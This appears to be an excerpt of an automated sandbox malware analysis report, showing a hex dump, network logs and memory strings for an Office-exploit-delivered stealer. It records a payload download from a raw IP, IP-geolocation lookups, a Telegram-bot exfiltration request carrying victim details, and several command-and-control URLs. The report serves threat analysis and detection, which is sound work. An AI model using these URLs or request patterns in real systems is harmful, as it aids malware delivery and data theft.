00 00 00 1e 00 00 06 2c 8f 00 00 f8 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 7c 00 00 00 00 00 00 00 02 28 15 00 00 0a 00 00 02 03 16 9a 28 16 00 00 0a 7d 08 00 00 04 02 02 7b 08 00 00 04 28 02 00 00 06 7d 01 00 00 04 02 03 17 9a 28 17 00 00 0a 7d 02 00 00 04 02 03 18 9a 28 17 00 00 0a 7d 04 00 00 04 02 03 19 9a 28 17 00 00 0a 7d 05 00 00 04 02 03 1a 9a 28 17 00 00 0a 7d 03 00 00 04 02 03 1b 9a 28 18 00 00 0a 7d 06 00 00 04 02 03 1c 9a 28 17 00 00 0a 7d 07 00 00 04 2a 13 30 02 00 21 00 00 00 01 00 00 11 00 0f 00 28 19 00 00 0a 20 6c 07 00 00 59 20 6d 01 00 00 5a 0f 00 28 1a 00 00 0a 58 0a 2b 00 06 2a 00 00 00 13 30 05 00 6d 01 00 00 02 00 00 11 02 73 1b 00 00 0a 7d 09 00 00 04 02 20 80 96 98 00 7d 0a 00 00 04 02 23 00 00 00 00 d0 12 63 41 7d 0b 00 00 04 02 20 80 69 67 ff 7d 0c 00 00 04 02 23 00 00 00 00 d0 12 63 c1 7d 0d 00 00 04 02 20 0f 27 00 00 17 17 73 1c 00 00 0a 7d 0e 00 00 04 02 17 17 17 73 1c 00 00 0a 7d 0f 00 00 04 02 16 7d 10 00 00 04 02 16 7d 11 00 00 04 02 28 15 00 00 0a 00 00 03 28 1d 00
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%209/26/2024%20/%204:38:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49171 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49169 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/LLnsOpxxAnmWi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D8964A50-9018-4193-BC8F-CBF79CAD82D1}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%209/26/2024%20/%204:38:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/LLnsOpxxAnmWi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 05:47:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exeC:
                  Source: EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exea
                  Source: EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exee
                  Source: EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.397052134.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/LLnsOpxxAnmWi.exerrC:
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023F4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002437000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000023E8000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: vvndewepeter91026.exe, 00000008.00000002.915012571.0000000005BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: vvndewepeter91026.exe, 00000008.00000002.915012571.0000000005BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000240C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024B7000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002495000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024F3000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002487000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: vvndewepeter91026.exe, 00000005.00000002.405973235.0000000002547000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: vvndewepeter91026.exe, 00000008.00000002.913169356.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000260C000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.0000000003417000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.914618854.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.000000000261F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: vvndewepeter91026.exe, 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: vvndewepeter91026.exe, 00000008.00000002.913786371.000000000250A000.00000004.00000800.00020000.00000000.sdmp, vvndewepeter91026.exe, 00000008.00000002.913786371.0000000002502000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
